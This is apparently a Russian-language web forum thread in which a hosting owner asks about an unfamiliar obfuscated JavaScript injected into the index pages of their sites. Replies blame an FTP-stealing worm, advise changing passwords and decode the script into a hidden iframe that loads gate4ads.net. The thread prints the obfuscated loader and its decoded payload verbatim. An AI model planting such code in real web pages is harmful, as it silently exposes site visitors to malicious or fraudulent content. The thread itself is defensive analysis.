У меня хостинг, где размещены много сайтов, недавно на страницах "index.*" заметил странный скрипт, такого никогда лично не внедрял, даже некоторые страницы становится неработоспособными, если появляется дополнительный код, подскажите, пожалуйста, суть существования этого скрипта, что бы смог предпринимать подходящие меры безопасности, понятное дело что внешняя программное обеспечение записывала этот код, а может и нет?
Код между скобками: "<script language=JavaScript>/*function varrban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,61,36,43,5,10,7,46,16,48,0,0,0,0,0,0,19,56,4,39,57,34,35,50,23,9,27,31,45,44,41,62,18,32,59,25,13,28,40,3,52,17,1,0,0,0,0,60,0,6,30,55,49,38,11,21,14,53,12,33,24,29,15,37,54,26,2,58,47,51,8,20,22,42,0);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(240^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}varrban('6eNCwODkbnvkYPlkWp_iXONCgb1GwOD24pSobPVc65leBxIpHuUex5l2mxIXbaSCgpM2gqS28nVQ@pMXlPvkzy_cKKS2BxIdYPDQbRSoBOTkK0_iJcJ2BENcrOSkbPIp1aIklsLQYsIoKpIpS3L94FU9rC1pHfSoxaDiJKLX8KlewPveTf_9IWTegeDolPluZWjG8nvkIGSoTfToShvQUaSE5RDCbxNXhu_cSqNQYpSohKmp')*/</script><!-- logisticsmoldova.com -->"
Странный скрипт на страницах моих сайтов!
Модератор: Duncon
скорей всего червь на каком то из компов имеющих фтп доступ к сайту.
Найти, обезвредить, сменить пароли доступа и не сохранять их в фтп-менеджере.
Найти, обезвредить, сменить пароли доступа и не сохранять их в фтп-менеджере.
c уважением, Леонид
Скрипт по буквам составляет выражение на яваскрипте и выполняет его через eval()
В данном случае это
Похоже, накрукта рекламных баннеров.
В данном случае это
Код: Выделить всё
window.status='Done';document.write('<iframe name=befa
src="http://gate4ads.net/t/?'+Math.round(Math.random()*25812)+'befa'+'"
width=239 height=108 style="display:none"></iframe>')